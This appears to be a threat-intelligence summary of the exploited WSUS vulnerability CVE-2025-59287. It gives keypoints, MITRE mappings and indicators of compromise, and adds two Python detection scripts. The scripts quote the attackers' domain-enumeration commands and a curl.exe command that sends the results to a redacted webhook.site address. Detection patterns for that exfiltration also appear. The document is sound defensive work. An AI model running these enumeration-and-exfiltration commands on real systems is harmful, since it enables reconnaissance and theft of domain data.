Microsoft released an out-of-band update on October 23 for CVE-2025-59287, an unauthenticated deserialization remote code execution vulnerability in Windows Server Update Services (WSUS) that has been exploited against publicly exposed WSUS instances on ports 8530/8531. Huntress observed attackers sending crafted POST requests to the WSUS web services; wsusservice.exe and w3wp.exe spawned cmd.exe and powershell.exe, which decoded a base64 PowerShell payload that enumerated the host and domain and exfiltrated the results to a remote webhook. #CVE-2025-59287 #WSUS
Keypoints
- Microsoft released an out-of-band security update for CVE-2025-59287, a remote code execution flaw in WSUS rooted in unsafe deserialization of the AuthorizationCookie.
- Exploitation was observed beginning ~2025-10-23 23:34 UTC against WSUS instances exposed on default ports 8530/TCP and 8531/TCP.
- Attackers sent multiple crafted POST requests to WSUS web services (ReportingWebService, SimpleAuthWebService, ClientWebService, ApiRemoting30) to trigger the vulnerability.
- Compromise chains included wsusservice.exe → cmd.exe → cmd.exe → powershell.exe and w3wp.exe → cmd.exe → cmd.exe → powershell.exe.
- A base64-encoded PowerShell payload was decoded and executed to enumerate domain users and network configuration, then exfiltrate the results to a remote webhook by HTTP PUT or by curl.exe -k with --data-binary.
- Proxy networks were used by attackers to obfuscate and conduct exploitation activity.
- Remediations: apply Microsoft's out-of-band WSUS security update, then block inbound TCP 8530/8531 at the perimeter and host firewall so that only WSUS clients, downstream WSUS servers and required management hosts can reach them. These ports never need to be reachable from the internet; the WSUS server's own synchronization with Microsoft Update is outbound and is unaffected by an inbound block.
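The keypoints above describe two artifacts a responder actually has in hand: the IIS W3C log of the WSUS site and the command line of the spawned powershell.exe. The following Python script is an added example, not code from the Huntress report or from this page. It applies the report's indicators to both: it parses an IIS log and returns POSTs to the four WSUS web services on 8530/8531 from outside your trusted client ranges, and it decodes the base64 PowerShell payload (the -EncodedCommand form, UTF-16LE, plus an inline FromBase64String literal) and lists which of the report's enumeration and exfiltration strings it contains. The log excerpt, client addresses, user agents and the sample command line are constructed for illustration; the endpoint list, ports, start time, enumeration commands and curl.exe form come from the report. The trusted network list and the marker strings are assumptions you would replace with your own.

```python
import base64
import ipaddress
import re
from datetime import datetime, timezone

# Constructed excerpt of an IIS W3C log (u_ex*.log under C:\inetpub\logs\LogFiles\W3SVC*)
# for a WSUS site. Not a real capture; addresses and user agents are illustrative.
# IIS writes W3C timestamps in UTC by default.
SAMPLE_IIS_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-10-23 23:10:12 10.0.0.5 POST /ClientWebService/Client.asmx - 8530 - 10.0.0.27 Windows-Update-Agent/10.0.10011.16384+Client-Protocol/2.0 - 200 0 0 31
2025-10-23 23:34:02 10.0.0.5 POST /ReportingWebService/ReportingWebService.asmx - 8531 - 203.0.113.45 python-requests/2.31 - 200 0 0 812
2025-10-23 23:34:05 10.0.0.5 POST /SimpleAuthWebService/SimpleAuth.asmx - 8531 - 203.0.113.45 python-requests/2.31 - 500 0 0 402
2025-10-23 23:34:09 10.0.0.5 POST /ApiRemoting30/WebService.asmx - 8531 - 203.0.113.45 python-requests/2.31 - 500 0 0 1104
2025-10-23 23:40:00 10.0.0.5 GET /Content/ABCD.cab - 8530 - 10.0.0.31 Windows-Update-Agent/10.0.10011.16384+Client-Protocol/2.0 - 200 0 0 5
"""

# The four WSUS web services named in the report, the default WSUS ports, and the
# approximate start of observed exploitation (per the report).
WSUS_ENDPOINTS = {"/reportingwebservice/reportingwebservice.asmx", "/simpleauthwebservice/simpleauth.asmx",
                  "/clientwebservice/client.asmx", "/apiremoting30/webservice.asmx"}
WSUS_PORTS = {"8530", "8531"}
EXPLOITATION_START = datetime(2025, 10, 23, 23, 34, tzinfo=timezone.utc)

def parse_w3c(text):
    """Yield one dict per request line, named by the columns in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):  # skip malformed lines rather than misalign columns
            yield dict(zip(fields, values))

def hunt_wsus_posts(text, trusted_nets, since=None):
    """POSTs to the WSUS web services on 8530/8531 from outside trusted_nets (optionally after since).

    Windows Update Agents POST to these endpoints all day, so the discriminating
    filter is the source address: only client and downstream-server ranges belong here.
    """
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    hits = []
    for row in parse_w3c(text):
        if row.get("cs-method") != "POST" or row.get("s-port") not in WSUS_PORTS:
            continue
        if row.get("cs-uri-stem", "").lower() not in WSUS_ENDPOINTS:
            continue
        ts = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
        if since is not None and ts < since:
            continue
        client = ipaddress.ip_address(row["c-ip"])
        if any(client in net for net in nets):
            continue
        hits.append({"time": ts.isoformat(), "client": str(client), "uri": row["cs-uri-stem"],
                     "port": row["s-port"], "status": row["sc-status"], "user_agent": row.get("cs(User-Agent)")})
    return hits

def powershell_encode(script):
    """Encode a script the way powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed stand-in for the observed payload: the enumeration commands and the curl.exe
# exfil form the report quotes, with the webhook URL redacted as on the page.
SAMPLE_PAYLOAD = ("$w = 'http://webhook.site/[REDACTED]'; "
                  "$r = $(whoami; net user /domain; ipconfig /all) | Out-String; "
                  "curl.exe -k $w --data-binary $r")
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -enc " + powershell_encode(SAMPLE_PAYLOAD)

# -EncodedCommand may be shortened to any unambiguous prefix; these are the usual spellings.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Scripts passed in the clear often still wrap the real payload in FromBase64String('...').
B64_LITERAL_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

def decode_powershell_payload(cmdline):
    """Return the plaintext script carried in a PowerShell command line, or None."""
    m = ENC_RE.search(cmdline)
    if m:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    m = B64_LITERAL_RE.search(cmdline)
    if m:
        return base64.b64decode(m.group(1)).decode("utf-8", errors="replace")
    return None

# Strings from the observed activity that have no business in a script launched by
# the WSUS service or its IIS worker process.
PAYLOAD_MARKERS = ("whoami", "net user /domain", "ipconfig /all", "webhook.site", "curl.exe -k", "--data-binary")

def payload_indicators(script):
    """List the known markers present in a decoded script, in PAYLOAD_MARKERS order."""
    low = script.lower()
    return [m for m in PAYLOAD_MARKERS if m in low]

if __name__ == "__main__":
    print(hunt_wsus_posts(SAMPLE_IIS_LOG, ["10.0.0.0/8"], since=EXPLOITATION_START))
    print(payload_indicators(decode_powershell_payload(SAMPLE_CMDLINE)))
```

Filtering on the source address rather than on the endpoint is deliberate: every healthy WSUS client POSTs to ClientWebService and ReportingWebService, so the endpoint alone is noise. An internet-routable source, or one outside the ranges you expect WSUS clients and downstream servers to come from, is the signal, and a 500 on ApiRemoting30 or SimpleAuth from that source shortly after 23:34 UTC on October 23 is worth pulling the matching process-creation events for.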
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Attackers targeted internet-exposed WSUS instances on default ports 8530/8531 and sent specially crafted POST requests to the web services to trigger the AuthorizationCookie deserialization RCE. Quote: ‘POST /ReportingWebService/ReportingWebService.asmx (get_server_id)’
- [T1505] Server Software Component – Exploitation leveraged vulnerabilities in WSUS service components (AuthorizationCookie deserialization) to execute code in service processes. Quote: ‘CVE-2025-59287 — WSUS Unauthenticated Remote Code Execution’
- [T1059] Command and Scripting Interpreter – cmd.exe and powershell.exe were spawned from wsusservice.exe and w3wp.exe to run commands and decode a base64 PowerShell payload. Quote: ‘wsusservice.exe → cmd.exe → cmd.exe → powershell.exe’
- [T1041] Exfiltration Over C2 Channel – Collected enumeration output was sent to an external webhook URL using HTTP PUT or curl. Quote: ‘http://webhook.site/[REDACTED]’; ‘curl.exe -k $w --data-binary $r’
- [T1090] Proxy – Attackers used proxy networks to conduct and obfuscate exploitation activity. Quote: ‘use of proxy networks being leveraged to conduct exploitation.’
Indicators of Compromise
- [File Path] WSUS and HTTP log files to review – C:\Program Files\Update Services\Logfiles\SoftwareDistribution.log, C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log
- [Process/Binary] Parent processes of the observed malicious chains – wsusservice.exe and w3wp.exe, each spawning cmd.exe → cmd.exe → powershell.exe
- [Network/URL] Exfiltration webhook and targeted WSUS endpoint – http://webhook.site/[REDACTED] (webhook receiving the enumeration output), https://[REDACTED]:8531 (exposed WSUS instance)
- [HTTP Requests] Malicious POST endpoints observed – POST /ReportingWebService/ReportingWebService.asmx, POST /SimpleAuthWebService/SimpleAuth.asmx, POST /ClientWebService/Client.asmx, POST /ApiRemoting30/WebService.asmx
- [Commands] Observed enumeration commands – ‘whoami; net user /domain’, ‘net user /domain; ipconfig /all’
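The process indicators above are only useful if you can turn them into a check against process-creation telemetry. The following Python is an added example, not code from the Huntress report or from this page: it rebuilds parent chains from a list of process-creation events and reports any cmd.exe, powershell.exe, pwsh.exe or curl.exe whose ancestry passes through wsusservice.exe or the WSUS application pool's w3wp.exe, emitting the chain in the same arrow form the report uses. The events are constructed in the shape of Sysmon Event ID 1 / Security 4688 records; the WsusService.exe path and the WsusPool application pool name are assumptions about a default WSUS role install, and the exfiltration markers are taken from the report's curl.exe quote.

```python
# Constructed process-creation events shaped like Sysmon Event ID 1 / Security 4688
# records (pid, parent pid, image, command line). Not a real capture: one chain under
# WsusService.exe, one under the WSUS IIS worker, and a benign interactive chain.
# The WsusService.exe path and the WsusPool application pool name are assumptions
# about a default WSUS role install.
EVENTS = [
    {"pid": 612,  "ppid": 4,    "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"pid": 4120, "ppid": 612,  "image": r"C:\Program Files\Update Services\Service\WsusService.exe", "cmdline": "WsusService.exe"},
    {"pid": 5232, "ppid": 612,  "image": r"C:\Windows\System32\inetsrv\w3wp.exe", "cmdline": 'w3wp.exe -ap "WsusPool" -v "v4.0"'},
    {"pid": 7004, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe", "cmdline": 'cmd.exe /c "cmd.exe /c powershell.exe -enc <base64>"'},
    {"pid": 7010, "ppid": 7004, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c powershell.exe -enc <base64>"},
    {"pid": 7022, "ppid": 7010, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe -enc <base64>"},
    {"pid": 7100, "ppid": 5232, "image": r"C:\Windows\System32\cmd.exe", "cmdline": 'cmd.exe /c "cmd.exe /c powershell.exe -enc <base64>"'},
    {"pid": 7104, "ppid": 7100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c powershell.exe -enc <base64>"},
    {"pid": 7120, "ppid": 7104, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe -enc <base64>"},
    {"pid": 7130, "ppid": 7120, "image": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe -k http://webhook.site/[REDACTED] --data-binary @out.txt"},
    {"pid": 3000, "ppid": 1,    "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 3010, "ppid": 3000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 3020, "ppid": 3010, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe -NoLogo"},
]

WSUS_ROOTS = {"wsusservice.exe", "w3wp.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe"}
EXFIL_MARKERS = ("webhook.site", "--data-binary")  # from the report's curl.exe quote

def image_name(path):
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ancestry(by_pid, pid, limit=64):
    """Walk parent links upward and return the events root-first.

    Keyed on pid only for this constructed sample; real telemetry must key on
    (pid, creation time) or Sysmon's ProcessGuid, because Windows reuses PIDs.
    """
    lineage, seen = [], set()
    while pid in by_pid and pid not in seen and len(lineage) < limit:
        seen.add(pid)
        lineage.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return lineage[::-1]

def find_wsus_spawned_interpreters(events):
    """Report interpreters whose ancestry runs through WsusService.exe or the WsusPool w3wp.exe.

    Only the last interpreter in each chain is reported, with the whole chain
    attached, so one intrusion yields one finding rather than one per cmd.exe hop.
    """
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(image_name(e["image"]))
    findings = []
    for e in events:
        if image_name(e["image"]) not in INTERPRETERS:
            continue
        if any(c in INTERPRETERS for c in children.get(e["pid"], [])):
            continue  # an interpreter further down the chain will carry this hop
        lineage = ancestry(by_pid, e["pid"])
        names = [image_name(a["image"]) for a in lineage]
        root = next((i for i, n in enumerate(names) if n in WSUS_ROOTS), None)
        if root is None:
            continue
        # Where IIS also serves other sites, only the WSUS application pool worker counts.
        if names[root] == "w3wp.exe" and "wsuspool" not in lineage[root]["cmdline"].lower():
            continue
        findings.append({
            "pid": e["pid"],
            "chain": " → ".join(names[root:]),
            "cmdline": e["cmdline"],
            "exfil": any(m in e["cmdline"].lower() for m in EXFIL_MARKERS),
        })
    return findings

if __name__ == "__main__":
    for f in find_wsus_spawned_interpreters(EVENTS):
        print(f["chain"], "| exfil" if f["exfil"] else "", "|", f["cmdline"])
```

On a patched, healthy WSUS server neither wsusservice.exe nor the WsusPool worker has any reason to launch cmd.exe or powershell.exe at all, so a non-empty result from this check is a strong signal on its own; the exfil flag and the decoded -enc payload then tell you how far the intrusion got.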